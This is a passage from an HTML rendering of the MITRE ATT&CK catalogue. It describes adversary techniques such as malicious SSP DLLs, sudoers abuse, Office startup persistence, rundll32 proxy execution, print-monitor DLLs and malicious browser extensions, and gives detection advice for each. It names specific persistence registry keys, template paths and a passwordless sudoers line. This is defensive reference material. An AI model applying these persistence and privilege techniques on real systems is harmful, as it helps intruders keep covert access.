<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 876. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1179">https://attack.mitre.org/wiki/Technique/T1179</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx">https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process">https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.adlice.com/userland-rootkits-part-1-iat-hooks/">https://www.adlice.com/userland-rootkits-part-1-iat-hooks/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/">https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.exploit-db.com/docs/17802.pdf">https://www.exploit-db.com/docs/17802.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf">https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html">https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/prekageo/winhook">https://github.com/prekageo/winhook</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/jay/gethooks">https://github.com/jay/gethooks</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/">https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/">https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.gmer.net/">http://www.gmer.net/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx">https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis">https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_automated_collection_t1119"><a class="anchor" href="#_automated_collection_t1119"></a><a class="link" href="#_automated_collection_t1119">Automated Collection - T1119</a></h3>
<div class="paragraph">
<p>Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of Scripting to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools.</p>
</div>
<div class="paragraph">
<p>This technique may incorporate use of other techniques such as File and Directory Discovery and Remote File Copy to identify and move files.</p>
</div>
<div class="paragraph">
<p>Detection: Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as Data Staged. As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process command-line parameters, Data loss prevention</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>System Requirements: Permissions to access directories and files that store information of interest.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 877. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1119">https://attack.mitre.org/wiki/Technique/T1119</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_security_support_provider_t1101"><a class="anchor" href="#_security_support_provider_t1101"></a><a class="link" href="#_security_support_provider_t1101">Security Support Provider - T1101</a></h3>
<div class="paragraph">
<p>Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user&#8217;s Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages&lt;/code&gt; and &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages&lt;/code&gt;. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.
(Citation: Graeber 2014)</p>
</div>
<div class="paragraph">
<p>Detection: Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: DLL monitoring, Windows Registry, Loaded DLLs</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 878. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1101">https://attack.mitre.org/wiki/Technique/T1101</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html">http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/dn408187.aspx">https://technet.microsoft.com/en-us/library/dn408187.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sudo_t1169"><a class="anchor" href="#_sudo_t1169"></a><a class="link" href="#_sudo_t1169">Sudo - T1169</a></h3>
<div class="paragraph">
<p>The sudoers file, &lt;code&gt;/etc/sudoers&lt;/code&gt;, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the idea of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like &lt;code&gt;user1 ALL=(ALL) NOPASSWD: ALL&lt;/code&gt; (Citation: OSX.Dok Malware).</p>
</div>
<div class="paragraph">
<p>Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file though.</p>
</div>
<div class="paragraph">
<p>Detection: On Linux, auditd can alert every time a user&#8217;s actual ID and effective ID are different (this is what happens when you sudo).</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: root</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 879. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1169">https://attack.mitre.org/wiki/Technique/T1169</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/">https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_office_application_startup_t1137"><a class="anchor" href="#_office_application_startup_t1137"></a><a class="link" href="#_office_application_startup_t1137">Office Application Startup - T1137</a></h3>
<div class="paragraph">
<p>Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.</p>
</div>
<div class="paragraph">
<p>===Office Template Macros===</p>
</div>
<div class="paragraph">
<p>Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)</p>
</div>
<div class="paragraph">
<p>Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can inserted into the base templated and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded. (Citation: enigma0x3 normal.dotm) (Citation: Hexacorn Office Template Macros)</p>
</div>
<div class="paragraph">
<p>Word Normal.dotm location:&lt;code&gt;C:\Users\(username)\AppData\Roaming\Microsoft\Templates\Normal.dotm&lt;/code&gt;</p>
</div>
<div class="paragraph">
<p>Excel Personal.xlsb location:&lt;code&gt;C:\Users\(username)\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB&lt;/code&gt;</p>
</div>
<div class="paragraph">
<p>An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.</p>
</div>
<div class="paragraph">
<p>===Office Test===</p>
</div>
<div class="paragraph">
<p>A Registry location was found that when a DLL reference was placed within it the corresponding DLL pointed to by the binary path would be executed every time an Office application is started (Citation: Hexacorn Office Test)</p>
</div>
<div class="paragraph">
<p>&lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;</p>
</div>
<div class="paragraph">
<p>===Add-ins===</p>
</div>
<div class="paragraph">
<p>Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins)</p>
</div>
<div class="paragraph">
<p>Add-ins can also be used to obtain persistence because they can be set to execute code when an Office application starts. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), and Visual Studio Tools for Office (VSTO) add-ins. (Citation: MRWLabs Office Persistence Add-ins)</p>
</div>
<div class="paragraph">
<p>Detection: Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Modification to base templated, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.</p>
</div>
<div class="paragraph">
<p>Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins. (Citation: MRWLabs Office Persistence Add-ins)</p>
</div>
<div class="paragraph">
<p>Non-standard process execution trees may also indicate suspicious or malicious behavior. Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, Process command-line parameters, Windows Registry, File monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<div class="paragraph">
<p>System Requirements: Office Test technique: Office 2007, 2010, 2013, 2015 and 2016
Add-ins: some require administrator permissions</p>
</div>
<div class="paragraph">
<p>Contributors: Ricardo Dias, Loic Jaquemet</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 880. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1137">https://attack.mitre.org/wiki/Technique/T1137</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea">https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office">https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/">https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/">http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/">http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460">https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/">https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rundll32_t1085"><a class="anchor" href="#_rundll32_t1085"></a><a class="link" href="#_rundll32_t1085">Rundll32 - T1085</a></h3>
<div class="paragraph">
<p>The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.</p>
</div>
<div class="paragraph">
<p>Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;Control_RunDLLAsUser&lt;/code&gt;. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)</p>
</div>
<div class="paragraph">
<p>Detection: Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Binary file metadata, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Anti-virus, Application whitelisting</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Remote Support: No</p>
</div>
<div class="paragraph">
<p>Contributors: Ricardo Dias</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 881. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1085">https://attack.mitre.org/wiki/Technique/T1085</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf">https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_network_sniffing_t1040"><a class="anchor" href="#_network_sniffing_t1040"></a><a class="link" href="#_network_sniffing_t1040">Network Sniffing - T1040</a></h3>
<div class="paragraph">
<p>Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.</p>
</div>
<div class="paragraph">
<p>User credentials may be sent over an insecure, unencrypted protocol that can be captured and obtained through network packet analysis. An adversary may place a network interface into promiscuous mode, using a utility to capture traffic in transit over the network or use span ports to capture a larger amount of data. In addition, techniques for name service resolution poisoning, such as LLMNR/NBT-NS Poisoning, can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.</p>
</div>
<div class="paragraph">
<p>Detection: Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a man-in-the-middle attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Network device logs, Host network interface, Netflow/Enclave netflow</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>System Requirements: Network interface access and packet capture driver</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 882. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1040">https://attack.mitre.org/wiki/Technique/T1040</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_port_monitors_t1013"><a class="anchor" href="#_port_monitors_t1013"></a><a class="link" href="#_port_monitors_t1013">Port Monitors - T1013</a></h3>
<div class="paragraph">
<p>A port monitor can be set through the (Citation: AddMonitor) API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in &lt;code&gt;C:\Windows\System32&lt;/code&gt; and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. The Registry key contains entries for the following:
*Local Port
*Standard TCP/IP Port
*USB Monitor
*WSD Port</p>
</div>
<div class="paragraph">
<p>Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.</p>
</div>
<div class="paragraph">
<p>Detection: * Monitor process API calls to (Citation: AddMonitor).
* Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal.
* New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious.
* Monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;.
* Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, API monitoring, DLL monitoring, Windows Registry, Process monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: SYSTEM</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Contributors: Stefan Kanthak, Travis Smith, Tripwire</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 883. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1013">https://attack.mitre.org/wiki/Technique/T1013</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-us/library/dd183341">http://msdn.microsoft.com/en-us/library/dd183341</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf">https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_browser_extensions_t1176"><a class="anchor" href="#_browser_extensions_t1176"></a><a class="link" href="#_browser_extensions_t1176">Browser Extensions - T1176</a></h3>
<div class="paragraph">
<p>Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser&#8217;s app store. Extensions generally have access and permissions to everything that the browser can access. (Citation: Wikipedia Browser Extension) (Citation: Chrome Extensions Definition)</p>
</div>
<div class="paragraph">
<p>Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so may not be difficult for malicious extensions to defeat automated scanners and be uploaded. (Citation: Malicious Chrome Extension Numbers) Once the extension is installed, it can browse to websites in the background, (Citation: Chrome Extension Crypto Miner) steal all information that a user enters into a browser, to include credentials, (Citation: Banker Google Chrome Extension Steals Creds) (Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence. There have been instances of botnets using a persistent backdoor through malicious Chrome extensions. (Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command &amp; control (Citation: Chrome Extension C2 Malware).</p>
</div>
<div class="paragraph">
<p>Detection: Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may would prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.</p>
</div>
<div class="paragraph">
<p>Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Network protocol analysis, Packet capture, System calls, Process use of network, Process monitoring, Browser extensions</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Contributors: Justin Warner, ICEBRG</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 884. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1176">https://attack.mitre.org/wiki/Technique/T1176</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Browser%20extension">https://en.wikipedia.org/wiki/Browser%20extension</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://developer.chrome.com/extensions">https://developer.chrome.com/extensions</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf">https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/">https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/">https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)">https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/">https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://kjaer.io/extension-malware/">https://kjaer.io/extension-malware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_software_packing_t1045"><a class="anchor" href="#_software_packing_t1045"></a><a class="link" href="#_software_packing_t1045">Software Packing - T1045</a></h3>
<div class="paragraph">
<p>Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.</p>
</div>
<div class="paragraph">
<p>Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.</p>
</div>
<div class="paragraph">
<p>Detection: Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Binary file metadata</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Anti-virus, heuristic detection, Signature-based detection</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 885. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1045">https://attack.mitre.org/wiki/Technique/T1045</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://en.wikipedia.org/wiki/Executable%20compression">http://en.wikipedia.org/wiki/Executable%20compression</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_application_window_discovery_t1010"><a class="anchor" href="#_application_window_discovery_t1010"></a><a class="link" href="#_application_window_discovery_t1010">Application Window Discovery - T1010</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.</p>
</div>
<div class="paragraph">
<p>In Mac, this can be done natively with a small AppleScript script.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 886. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
